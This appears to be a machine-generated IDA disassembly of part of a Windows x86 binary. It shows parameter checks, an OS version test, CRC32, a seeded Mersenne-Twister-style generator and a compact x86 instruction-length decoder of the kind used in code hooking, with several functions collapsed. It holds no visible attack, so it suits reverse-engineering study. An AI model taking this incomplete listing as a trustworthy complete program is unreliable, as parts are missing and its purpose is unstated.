sub_9A9E4E proc near ; CODE XREF: sub_9A8FF3+BE�p
Val = byte ptr -9F08h
Src = byte ptr -2C8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = dword ptr 30h
arg_2C = dword ptr 34h
push ebp
mov ebp, esp
mov eax, 9F08h
call __alloca_probe
push edi
xor edi, edi
cmp [ebp+arg_0], edi
jnz short loc_9A9E67
push 0Fh
jmp short loc_9A9E6E
; ---------------------------------------------------------------------------
loc_9A9E67: ; CODE XREF: sub_9A9E4E+13�j
cmp [ebp+arg_2C], edi
jnz short loc_9A9E74
push 0Ah
loc_9A9E6E: ; CODE XREF: sub_9A9E4E+17�j
pop eax
jmp loc_9A9F40
; ---------------------------------------------------------------------------
loc_9A9E74: ; CODE XREF: sub_9A9E4E+1C�j
xor ecx, ecx
push esi
mov esi, [ebp+arg_14]
mov eax, 0FFh
cmp esi, eax
setnle cl
xor edx, edx
cmp esi, edi
setl dl
or ecx, edx
jz short loc_9A9E96
push 11h
jmp loc_9A9F3E
; ---------------------------------------------------------------------------
loc_9A9E96: ; CODE XREF: sub_9A9E4E+3F�j
xor ecx, ecx
cmp [ebp+arg_18], eax
setnle cl
xor edx, edx
cmp [ebp+arg_18], edi
setl dl
or ecx, edx
jz short loc_9A9EB1
push 10h
jmp loc_9A9F3E
; ---------------------------------------------------------------------------
loc_9A9EB1: ; CODE XREF: sub_9A9E4E+5A�j
cmp [ebp+arg_C], edi
jl loc_9A9F3C
cmp [ebp+arg_C], eax
jg short loc_9A9F3C
cmp [ebp+arg_20], edi
jl short loc_9A9F38
cmp [ebp+arg_20], 1000h
jg short loc_9A9F38
cmp [ebp+arg_28], edi
jle short loc_9A9F34
cmp [ebp+arg_28], 200h
jg short loc_9A9F34
cmp [ebp+arg_8], edi
jnz short loc_9A9EE4
push 0Dh
jmp short loc_9A9F3E
; ---------------------------------------------------------------------------
loc_9A9EE4: ; CODE XREF: sub_9A9E4E+90�j
cmp [ebp+arg_4], edi
jnz short loc_9A9EED
push 0Eh
jmp short loc_9A9F3E
; ---------------------------------------------------------------------------
loc_9A9EED: ; CODE XREF: sub_9A9E4E+99�j
push [ebp+arg_2C]
lea eax, [ebp+Src]
push [ebp+arg_28]
push [ebp+arg_24]
push [ebp+arg_20]
push [ebp+arg_1C]
push [ebp+arg_18]
push esi
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_9A9DA3
lea eax, [ebp+Val]
push eax ; Val
push esi ; int
lea eax, [ebp+Src]
push eax ; Src
push [ebp+arg_0] ; int
call sub_9A9C7E
add esp, 40h
jmp short loc_9A9F3F
; ---------------------------------------------------------------------------
loc_9A9F34: ; CODE XREF: sub_9A9E4E+82�j
; sub_9A9E4E+8B�j
push 2
jmp short loc_9A9F3E
; ---------------------------------------------------------------------------
loc_9A9F38: ; CODE XREF: sub_9A9E4E+74�j
; sub_9A9E4E+7D�j
push 0Ch
jmp short loc_9A9F3E
; ---------------------------------------------------------------------------
loc_9A9F3C: ; CODE XREF: sub_9A9E4E+66�j
; sub_9A9E4E+6F�j
push 0Bh
loc_9A9F3E: ; CODE XREF: sub_9A9E4E+43�j
; sub_9A9E4E+5E�j ...
pop eax
loc_9A9F3F: ; CODE XREF: sub_9A9E4E+E4�j
pop esi
loc_9A9F40: ; CODE XREF: sub_9A9E4E+21�j
pop edi
leave
retn
sub_9A9E4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_9A9F43 proc near ; CODE XREF: sub_9B1F68+63�p
VersionInformation= _OSVERSIONINFOA ptr -0A0h
var_C = word ptr -0Ch
var_4 = dword ptr -4
push ebp
lea ebp, [esp-78h]
sub esp, 0A0h
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+78h+var_4], eax
lea eax, [ebp+78h+VersionInformation]
push eax ; lpVersionInformation
mov [ebp+78h+VersionInformation.dwOSVersionInfoSize], 9Ch
call GetVersionExA
test eax, eax
jnz short loc_9A9F72
loc_9A9F6D: ; CODE XREF: sub_9A9F43+35�j
; sub_9A9F43+4E�j ...
push 0Ah
pop eax
jmp short loc_9A9F9F
; ---------------------------------------------------------------------------
loc_9A9F72: ; CODE XREF: sub_9A9F43+28�j
cmp [ebp+78h+VersionInformation.dwMajorVersion], 5
jb short loc_9A9F9A
jnz short loc_9A9F6D
cmp [ebp+78h+VersionInformation.dwMinorVersion], 0
jz short loc_9A9F9A
cmp [ebp+78h+VersionInformation.dwMinorVersion], 1
jnz short loc_9A9F8D
cmp [ebp+78h+var_C], 2
jb short loc_9A9F9A
loc_9A9F8D: ; CODE XREF: sub_9A9F43+41�j
cmp [ebp+78h+VersionInformation.dwMinorVersion], 2
jnz short loc_9A9F6D
cmp [ebp+78h+var_C], 1
jnb short loc_9A9F6D
loc_9A9F9A: ; CODE XREF: sub_9A9F43+33�j
; sub_9A9F43+3B�j ...
mov eax, 3E8h
loc_9A9F9F: ; CODE XREF: sub_9A9F43+2D�j
mov ecx, [ebp+78h+var_4]
xor ecx, ebp
call sub_9AAAC1
add ebp, 78h
leave
retn
sub_9A9F43 endp
; =============== S U B R O U T I N E =======================================
sub_9A9FAE proc near ; CODE XREF: sub_9A3C63+80�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push edi
or edi, 0FFFFFFFFh
test eax, eax
jz short loc_9A9FE2
mov edx, [esp+4+arg_0]
push ebx
push esi
loc_9A9FC0: ; CODE XREF: sub_9A9FAE+30�j
movzx ecx, byte ptr [edx]
push 8
inc edx
pop esi
loc_9A9FC7: ; CODE XREF: sub_9A9FAE+2D�j
mov ebx, ecx
xor ebx, edi
shr edi, 1
test bl, 1
jz short loc_9A9FD8
xor edi, 0EDB88320h
loc_9A9FD8: ; CODE XREF: sub_9A9FAE+22�j
shr ecx, 1
dec esi
jnz short loc_9A9FC7
dec eax
jnz short loc_9A9FC0
pop esi
pop ebx
loc_9A9FE2: ; CODE XREF: sub_9A9FAE+A�j
mov eax, edi
pop edi
retn
sub_9A9FAE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A9FE6(int,int,void *Dst)
sub_9A9FE6 proc near ; CODE XREF: sub_9AA577+90�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Dst = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, [ebp+Dst]
push edi
push 9C0h ; Size
push 8Bh ; Val
push esi ; Dst
call memset
and dword ptr [esi+9C4h], 0
mov ebx, [ebp+arg_4]
add esp, 0Ch
inc ebx
mov edi, 270h
cmp ebx, edi
mov [esi+9C0h], esi
jg short loc_9AA020
mov ebx, edi
loc_9AA020: ; CODE XREF: sub_9A9FE6+36�j
mov edx, [esi+4C8h]
mov ecx, [esi+9BCh]
xor ecx, edx
xor ecx, [esi]
and [ebp+Dst], 0
mov eax, ecx
shr eax, 1Bh
xor eax, ecx
imul eax, 19660Dh
add edx, eax
add eax, [ebp+arg_4]
mov [esi+4C8h], edx
mov ecx, [esi+9C0h]
add [ecx+4F4h], eax
mov ecx, [esi+9C0h]
mov [ecx], eax
xor ecx, ecx
dec ebx
inc ecx
test ebx, ebx
mov [ebp+var_8], ebx
jle loc_9AA19B
loc_9AA06F: ; CODE XREF: sub_9A9FE6+123�j
mov eax, [ebp+arg_4]
cmp [ebp+Dst], eax
jge loc_9AA10F
lea eax, [ecx+132h]
cdq
mov ebx, edi
idiv ebx
mov eax, [esi+9C0h]
lea eax, [eax+edx*4]
mov [ebp+var_4], eax
lea eax, [ecx+26Fh]
cdq
idiv ebx
mov eax, edx
mov edx, [esi+9C0h]
mov eax, [edx+eax*4]
xor eax, [edx+ecx*4]
mov edx, [ebp+var_4]
mov ebx, [edx]
xor eax, ebx
mov edx, eax
shr edx, 1Bh
xor edx, eax
mov eax, [ebp+var_4]
imul edx, 19660Dh
add ebx, edx
mov [eax], ebx
mov ebx, [ebp+Dst]
mov eax, [ebp+arg_0]
mov eax, [eax+ebx*4]
add eax, ecx
add edx, eax
mov [ebp+var_4], edx
lea eax, [ecx+13Dh]
cdq
mov ebx, edi
idiv ebx
mov eax, [esi+9C0h]
mov ebx, [ebp+var_8]
lea eax, [eax+edx*4]
mov edx, [ebp+var_4]
add [eax], edx
mov eax, [esi+9C0h]
mov [eax+ecx*4], edx
lea eax, [ecx+1]
cdq
mov ecx, edi
idiv ecx
inc [ebp+Dst]
cmp [ebp+Dst], ebx
mov ecx, edx
jl loc_9AA06F
loc_9AA10F: ; CODE XREF: sub_9A9FE6+8F�j
cmp [ebp+Dst], ebx
jge loc_9AA19B
sub ebx, [ebp+Dst]
mov [ebp+arg_4], ebx
loc_9AA11E: ; CODE XREF: sub_9A9FE6+1B3�j
lea eax, [ecx+132h]
cdq
mov ebx, edi
idiv ebx
mov eax, [esi+9C0h]
lea eax, [eax+edx*4]
mov [ebp+var_4], eax
lea eax, [ecx+26Fh]
cdq
idiv ebx
mov eax, [esi+9C0h]
mov edx, [eax+edx*4]
xor edx, [eax+ecx*4]
mov eax, [ebp+var_4]
mov ebx, [eax]
xor edx, ebx
mov eax, edx
shr eax, 1Bh
xor eax, edx
mov edx, [ebp+var_4]
imul eax, 19660Dh
add ebx, eax
add eax, ecx
mov [ebp+var_4], eax
mov [edx], ebx
lea eax, [ecx+13Dh]
cdq
mov ebx, edi
idiv ebx
mov eax, [esi+9C0h]
lea eax, [eax+edx*4]
mov edx, [ebp+var_4]
add [eax], edx
mov eax, [esi+9C0h]
mov [eax+ecx*4], edx
lea eax, [ecx+1]
cdq
mov ecx, edi
idiv ecx
dec [ebp+arg_4]
mov ecx, edx
jnz short loc_9AA11E
loc_9AA19B: ; CODE XREF: sub_9A9FE6+83�j
; sub_9A9FE6+12C�j
mov [ebp+arg_4], edi
loc_9AA19E: ; CODE XREF: sub_9A9FE6+238�j
lea eax, [ecx+132h]
cdq
mov ebx, edi
idiv ebx
mov eax, [esi+9C0h]
lea eax, [eax+edx*4]
mov [ebp+var_4], eax
mov eax, [eax]
mov [ebp+Dst], eax
lea eax, [ecx+26Fh]
cdq
idiv ebx
mov ebx, [ebp+Dst]
mov eax, edx
mov edx, [esi+9C0h]
mov eax, [edx+eax*4]
add eax, [edx+ecx*4]
add eax, ebx
mov edx, eax
shr edx, 1Bh
xor edx, eax
mov eax, [ebp+var_4]
imul edx, 5D588B65h
xor ebx, edx
mov [eax], ebx
sub edx, ecx
mov [ebp+var_4], edx
lea eax, [ecx+13Dh]
cdq
mov ebx, edi
idiv ebx
mov eax, [esi+9C0h]
lea eax, [eax+edx*4]
mov edx, [ebp+var_4]
xor [eax], edx
mov eax, [esi+9C0h]
mov [eax+ecx*4], edx
lea eax, [ecx+1]
cdq
mov ecx, edi
idiv ecx
dec [ebp+arg_4]
mov ecx, edx
jnz loc_9AA19E
mov ecx, [esi+9C0h]
mov [esi+9C4h], edi
mov eax, offset dword_9B8778
xor edi, edi
sub ecx, eax
loc_9AA239: ; CODE XREF: sub_9A9FE6+262�j
mov edx, [ecx+eax]
and edx, [eax]
add eax, 4
xor edi, edx
cmp eax, offset dword_9B8788
jl short loc_9AA239
push 10h
pop ecx
loc_9AA24D: ; CODE XREF: sub_9A9FE6+271�j
mov eax, edi
sar eax, cl
sar ecx, 1
xor edi, eax
test ecx, ecx
jg short loc_9AA24D
and edi, 1
jnz short loc_9AA293
xor ecx, ecx
loc_9AA260: ; CODE XREF: sub_9A9FE6+2AB�j
cmp ecx, 10h
jge short loc_9AA293
mov eax, dword_9B8778[ecx]
xor edx, edx
inc edx
xor ebx, ebx
loc_9AA270: ; CODE XREF: sub_9A9FE6+294�j
test eax, edx
jnz short loc_9AA27E
shl edx, 1
inc ebx
cmp ebx, 20h
jl short loc_9AA270
jmp short loc_9AA28B
; ---------------------------------------------------------------------------
loc_9AA27E: ; CODE XREF: sub_9A9FE6+28C�j
mov eax, [esi+9C0h]
add eax, ecx
xor [eax], edx
xor edi, edi
inc edi
loc_9AA28B: ; CODE XREF: sub_9A9FE6+296�j
add ecx, 4
cmp edi, 1
jnz short loc_9AA260
loc_9AA293: ; CODE XREF: sub_9A9FE6+276�j
; sub_9A9FE6+27D�j
pop edi
pop esi
pop ebx
leave
retn
sub_9A9FE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AA298 proc near ; CODE XREF: sub_9AA638+10�p
var_44 = dword ptr -44h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 50h
mov eax, [ebp+arg_0]
cmp dword ptr [eax+9C4h], 270h
jl loc_9AA55D
lea ecx, [eax+9A0h]
push ebx
mov [ebp+var_4], ecx
push esi
lea ecx, [eax+9B0h]
add eax, 7A8h
mov [ebp+var_8], 22h
push edi
loc_9AA2CF: ; CODE XREF: sub_9AA298+16E�j
mov edi, [eax-7A8h]
mov esi, [eax-7A4h]
mov [ebp+var_10], edi
xor edx, edx
or edx, edi
mov edi, [eax-7A0h]
xor ebx, ebx
or esi, ebx
mov [ebp+var_24], esi
mov [ebp+var_C], esi
shld esi, edx, 8
shl edx, 8
mov [ebp+var_18], edx
xor edx, edx
or edx, edi
mov [ebp+var_14], esi
mov esi, [eax-79Ch]
or esi, ebx
mov edi, esi
shld edi, edx, 8
shl edx, 8
mov esi, edx
mov edx, edi
mov edi, [ebp+var_24]
shr edi, 18h
or esi, edi
mov edi, [ebp+var_4]
or edx, ebx
mov [ebp+var_44], edx
mov edx, [edi+0Ch]
mov edi, [edi+8]
or edx, ebx
mov [ebp+var_30], esi
xor esi, esi
or esi, edi
mov edi, esi
shrd edi, edx, 8
mov [ebp+var_20], edi
xor edi, edi
shr edx, 8
mov [ebp+var_1C], edx
mov edx, [ebp+var_4]
mov edx, [edx+4]
or edx, ebx
mov [ebp+var_C], esi
or esi, edi
mov edi, [ebp+var_4]
mov edi, [edi]
shr edi, 8
shld esi, edx, 18h
shl edx, 18h
or edx, edi
mov edi, [ebp+var_1C]
mov [ebp+var_34], edi
mov edi, [eax-8]
shr edi, 0Bh
and edi, 1FFFEFh
or esi, ebx
mov ebx, [ecx]
shl ebx, 12h
xor edi, ebx
xor edi, edx
xor edi, [ebp+var_10]
lea edx, [eax-7A8h]
xor edi, [ebp+var_18]
mov [edx], edi
mov edi, [eax-4]
mov ebx, [ecx+4]
shr edi, 0Bh
and edi, 1ECB7Fh
shl ebx, 12h
xor edi, ebx
xor edi, [eax-7A4h]
xor edi, esi
xor edi, [ebp+var_14]
mov [eax-7A4h], edi
mov esi, [eax]
mov edi, [ecx+8]
shr esi, 0Bh
and esi, 1AFFFFh
shl edi, 12h
xor esi, edi
xor esi, [ebp+var_20]
add eax, 10h
xor esi, [ebp+var_30]
mov [ebp+var_4], ecx
xor [eax-7B0h], esi
mov esi, [eax-0Ch]
mov edi, [ecx+0Ch]
shr esi, 0Bh
and esi, 1FFFF6h
shl edi, 12h
xor esi, edi
xor esi, [eax-7ACh]
mov ecx, edx
xor esi, [ebp+var_34]
xor esi, [ebp+var_44]
dec [ebp+var_8]
mov [eax-7ACh], esi
jnz loc_9AA2CF
mov eax, [ebp+arg_0]
add eax, 8
mov [ebp+var_8], 7Ah
loc_9AA419: ; CODE XREF: sub_9AA298+2B2�j
mov edi, [eax+218h]
mov esi, [eax+21Ch]
mov [ebp+var_C], edi
xor edx, edx
or edx, edi
mov edi, [eax+220h]
xor ebx, ebx
or esi, ebx
mov [ebp+var_2C], esi
mov [ebp+var_10], esi
shld esi, edx, 8
shl edx, 8
mov [ebp+var_20], edx
xor edx, edx
or edx, edi
mov [ebp+var_1C], esi
mov esi, [eax+224h]
or esi, ebx
mov edi, esi
shld edi, edx, 8
shl edx, 8
mov esi, edx
mov edx, edi
mov edi, [ebp+var_2C]
shr edi, 18h
or esi, edi
mov edi, [ebp+var_4]
or edx, ebx
mov [ebp+var_34], edx
mov edx, [edi+0Ch]
mov edi, [edi+8]
or edx, ebx
mov [ebp+var_28], esi
xor esi, esi
or esi, edi
mov edi, esi
shrd edi, edx, 8
mov [ebp+var_18], edi
xor edi, edi
shr edx, 8
mov [ebp+var_14], edx
mov edx, [ebp+var_4]
mov edx, [edx+4]
or edx, ebx
mov [ebp+var_10], esi
or esi, edi
mov edi, [ebp+var_4]
mov edi, [edi]
shr edi, 8
shld esi, edx, 18h
shl edx, 18h
or edx, edi
mov edi, [ebp+var_14]
mov [ebp+var_44], edi
mov edi, [eax-8]
shr edi, 0Bh
and edi, 1FFFEFh
or esi, ebx
mov ebx, [ecx]
shl ebx, 12h
xor edi, ebx
xor edi, [ebp+var_C]
xor edi, edx
xor edi, [ebp+var_20]
lea edx, [eax+218h]
mov [edx], edi
mov edi, [eax-4]
mov ebx, [ecx+4]
shr edi, 0Bh
and edi, 1ECB7Fh
shl ebx, 12h
xor edi, ebx
xor edi, esi
xor edi, [ebp+var_1C]
xor [eax+21Ch], edi
mov edi, [eax]
mov esi, [ecx+8]
shr edi, 0Bh
shl esi, 12h
and edi, 1AFFFFh
xor esi, edi
xor esi, [eax+220h]
add eax, 10h
xor esi, [ebp+var_18]
mov [ebp+var_4], ecx
xor esi, [ebp+var_28]
mov [eax+210h], esi
mov esi, [eax-0Ch]
mov edi, [ecx+0Ch]
shr esi, 0Bh
and esi, 1FFFF6h
shl edi, 12h
xor esi, edi
xor esi, [ebp+var_44]
mov ecx, edx
xor esi, [ebp+var_34]
xor [eax+214h], esi
dec [ebp+var_8]
jnz loc_9AA419
mov eax, [ebp+arg_0]
and dword ptr [eax+9C4h], 0
pop edi
pop esi
pop ebx
loc_9AA55D: ; CODE XREF: sub_9AA298+13�j
mov ecx, [eax+9C4h]
mov edx, [eax+9C0h]
mov edx, [edx+ecx*4]
inc ecx
mov [eax+9C4h], ecx
mov eax, edx
leave
retn
sub_9AA298 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_9AA577 proc near ; CODE XREF: sub_9A857A+44�p
Dst = byte ptr -134h
PerformanceCount= LARGE_INTEGER ptr -34h
SystemTime = _SYSTEMTIME ptr -2Ch
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
hProv = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 134h
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+74h+var_4], eax
push esi
mov esi, [ebp+74h+arg_0]
lea eax, [ebp+74h+PerformanceCount]
push eax ; lpPerformanceCount
call QueryPerformanceCounter
lea eax, [ebp+74h+SystemTime]
push eax ; lpSystemTime
call GetSystemTime
call GetTickCount
mov [ebp+74h+var_1C], eax
rdtsc
mov [ebp+74h+var_14], eax
mov [ebp+74h+var_10], edx
call GetCurrentThreadId
push 0F0000040h ; dwFlags
push 1 ; dwProvType
push offset szProvider ; "Microsoft Base Cryptographic Provider v"...
mov [ebp+74h+var_C], eax
push 0 ; szContainer
lea eax, [ebp+74h+hProv]
push eax ; phProv
call CryptAcquireContextA
test eax, eax
jz short loc_9AA5FA
lea eax, [ebp+74h+Dst]
push eax ; pbBuffer
push 100h ; dwLen
push [ebp+74h+hProv] ; hProv
call CryptGenRandom
push 0 ; dwFlags
push [ebp+74h+hProv] ; hProv
call CryptReleaseContext
loc_9AA5FA: ; CODE XREF: sub_9AA577+61�j
lea eax, [esi+4]
push eax ; Dst
lea eax, [ebp+74h+Dst]
push 4Ch ; int
push eax ; int
call sub_9A9FE6
push 130h ; Size
lea eax, [ebp+74h+Dst]
push 0 ; Val
push eax ; Dst
mov dword ptr [esi], 12345678h
call memset
mov ecx, [ebp+74h+var_4]
add esp, 18h
xor ecx, ebp
pop esi
call sub_9AAAC1
add ebp, 74h
leave
retn
sub_9AA577 endp
; =============== S U B R O U T I N E =======================================
sub_9AA638 proc near ; CODE XREF: sub_9A83C7+24�p
; sub_9A857A+172�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp dword ptr [eax], 12345678h
jnz short loc_9AA64F
add eax, 4
push eax
call sub_9AA298
pop ecx
retn
; ---------------------------------------------------------------------------
loc_9AA64F: ; CODE XREF: sub_9AA638+A�j
jmp rand
sub_9AA638 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9AA660 proc near ; CODE XREF: sub_9A5938+68�p
var_90 = dword ptr -90h
arg_0 = dword ptr 4
pusha
cld
xor edx, edx
mov esi, [esp+20h+arg_0]
mov ebp, esp
push 1097F71Ch
push 0F71C6780h
push 17389718h
push 101CB718h
push 17302C17h
push 18173017h
push 0F715F547h
push 4C103748h
push 272CE7F7h
push 0F7AC6087h
push 1C121C52h
push 7C10871Ch
push 201C701Ch
push 4767602Bh
push 20211011h
push 40121625h
push 82872022h
push 47201220h
push 13101419h
push 18271013h
push 28858260h
push 15124045h
push 5016A0C7h
push 28191812h
push 0F2401812h
push 19154127h
push 50F0F011h
mov ecx, 15124710h
push ecx
push 11151247h
push 10111512h
push 47101115h
mov eax, 12472015h
push eax
push eax
push 12471A10h
add cl, 10h
push ecx
sub cl, 20h
push ecx
xor ecx, ecx
dec ecx
loc_9AA71D: ; CODE XREF: sub_9AA660+E0�j
inc ecx
mov edi, esp
loc_9AA720: ; CODE XREF: sub_9AA660+EA�j
lodsb
mov bh, al
loc_9AA723: ; CODE XREF: sub_9AA660+CB�j
mov ah, [edi]
inc edi
shr ah, 4
sub al, ah
jnb short loc_9AA723
mov al, [edi-1]
and al, 0Fh
cmp al, 0Ch
jnz short loc_9AA739
pop edx
not edx
loc_9AA739: ; CODE XREF: sub_9AA660+D4�j
inc edx
cmp al, 0
jz short loc_9AA77F
cmp al, 1
jz short loc_9AA71D
add edi, 51h
cmp al, 0Ah
jz short loc_9AA720
mov edi, [ebp+24h]
inc edx
cmp al, 2
jz short loc_9AA77F
cmp al, 7
jz short loc_9AA787
cmp al, 0Bh
jz short loc_9AA7DA
loc_9AA75C: ; CODE XREF: sub_9AA660+185�j
inc edx
cmp al, 3
jz short loc_9AA77F
cmp al, 8
jz short loc_9AA787
inc edx
cmp al, 4
jz short loc_9AA77F
inc edx
inc edx
pusha
mov al, 66h
repne scasb
popa
jnz short loc_9AA776
loc_9AA774: ; CODE XREF: sub_9AA660+190�j
; sub_9AA660+1A8�j
dec edx
dec edx
loc_9AA776: ; CODE XREF: sub_9AA660+112�j
cmp al, 9
jz short loc_9AA787
sub al, 5
jz short loc_9AA7EA
loc_9AA77E: ; CODE XREF: sub_9AA660+16A�j
; sub_9AA660+16E�j ...
inc edx
loc_9AA77F: ; CODE XREF: sub_9AA660+DC�j
; sub_9AA660+F2�j ...
mov esp, ebp
mov [esp+0ACh+var_90], edx
popa
retn
; ---------------------------------------------------------------------------
loc_9AA787: ; CODE XREF: sub_9AA660+F6�j
; sub_9AA660+103�j ...
lodsb
mov ah, al
shr al, 7
jb short loc_9AA7A1
jz short loc_9AA7A5
add dl, 4
pusha
mov al, 67h
repne scasb
popa
jnz short loc_9AA7A5
sub dl, 3
dec al
loc_9AA7A1: ; CODE XREF: sub_9AA660+12D�j
jnz short loc_9AA77F
inc edx
inc eax
loc_9AA7A5: ; CODE XREF: sub_9AA660+12F�j
; sub_9AA660+13A�j
and ah, 7
pusha
mov al, 67h
repne scasb
popa
jz short loc_9AA7C3
cmp ah, 4
jz short loc_9AA7CC
cmp ah, 5
jnz short loc_9AA77F
dec al
jz short loc_9AA77F
loc_9AA7BE: ; CODE XREF: sub_9AA660+178�j
add dl, 4
jmp short loc_9AA77F
; ---------------------------------------------------------------------------
loc_9AA7C3: ; CODE XREF: sub_9AA660+14E�j
cmp ax, 600h
jnz short loc_9AA77F
inc edx
jmp short loc_9AA77E
; ---------------------------------------------------------------------------
loc_9AA7CC: ; CODE XREF: sub_9AA660+153�j
cmp al, 0
jnz short loc_9AA77E
lodsb
and al, 7
sub al, 5
jnz short loc_9AA77E
inc edx
jmp short loc_9AA7BE
; ---------------------------------------------------------------------------
loc_9AA7DA: ; CODE XREF: sub_9AA660+FA�j
test byte ptr [esi], 38h
jnz short loc_9AA787
mov al, 8
shr bh, 1
adc al, 0
jmp loc_9AA75C
; ---------------------------------------------------------------------------
loc_9AA7EA: ; CODE XREF: sub_9AA660+11C�j
sub bh, 0A0h
cmp bh, 4
jnb short loc_9AA774
pusha
mov al, 67h
repne scasb
popa
jnz short loc_9AA7FC
dec edx
dec edx
loc_9AA7FC: ; CODE XREF: sub_9AA660+198�j
pusha
mov al, 66h
repne scasb
popa
jz loc_9AA77E
jnz loc_9AA774
loc_9AA80E: ; DATA XREF: .text:009B8004�o
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_9B8788
test eax, eax
jz short loc_9AA824
cmp eax, 0BB40E64Eh
jnz short locret_9AA872
loc_9AA824: ; CODE XREF: sub_9AA660+1BB�j
push esi
lea eax, [ebp-8]
push eax ; lpSystemTimeAsFileTime
call GetSystemTimeAsFileTime
mov esi, [ebp-4]
xor esi, [ebp-8]
call GetCurrentProcessId
xor esi, eax
call GetCurrentThreadId
xor esi, eax
call GetTickCount
xor esi, eax
lea eax, [ebp-10h]
push eax ; lpPerformanceCount
call QueryPerformanceCounter
mov eax, [ebp-0Ch]
xor eax, [ebp-10h]
xor esi, eax
mov dword_9B8788, esi
jnz short loc_9AA871
mov dword_9B8788, 0BB40E64Eh
loc_9AA871: ; CODE XREF: sub_9AA660+205�j
pop esi
locret_9AA872: ; CODE XREF: sub_9AA660+1C2�j
leave
retn
sub_9AA660 endp ; sp-analysis failed
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler. PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+" TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
__NLG_Notify1:
push ebx
push ecx
mov ebx, offset dword_9B878C
jmp short loc_9AA9A0
; [00000018 BYTES: COLLAPSED FUNCTION __NLG_Notify. PRESS KEYPAD "+" TO EXPAND]
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; [000000BD BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
unknown_libname_2: ; Microsoft VisualC 2-8/net runtime
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call __local_unwind2
add esp, 8
pop ebp
retn 4
; ---------------------------------------------------------------------------
; [00000019 BYTES: COLLAPSED CHUNK OF FUNCTION sub_9AAAC1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
pop ecx
pop ecx
jmp short loc_9AAAB4
; ---------------------------------------------------------------------------
loc_9AAAAD: ; DATA XREF: .text:stru_9A3600�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AAAB1: ; DATA XREF: .text:stru_9A3600�o
mov esp, [ebp-18h]
loc_9AAAB4: ; CODE XREF: .text:009AAAAB�j
or dword ptr [ebp-4], 0FFFFFFFFh
push 3
call ExitProcess
; ---------------------------------------------------------------------------
db 0CCh
; [0000000E BYTES: COLLAPSED FUNCTION sub_9AAAC1. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION strlen. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION memset. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION memcpy. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002F BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000068 BYTES: COLLAPSED FUNCTION __aulldiv. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000034 BYTES: COLLAPSED FUNCTION __allmul. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION log. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION sin. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION labs. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION strcat. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION memcmp. PRESS KEYPAD "+" TO EXPAND]
align 10h
__allshl:
cmp cl, 40h
jnb short loc_9AAC0A
cmp cl, 20h
jnb short loc_9AAC00
shld edx, eax, cl
shl eax, cl
retn
; ---------------------------------------------------------------------------
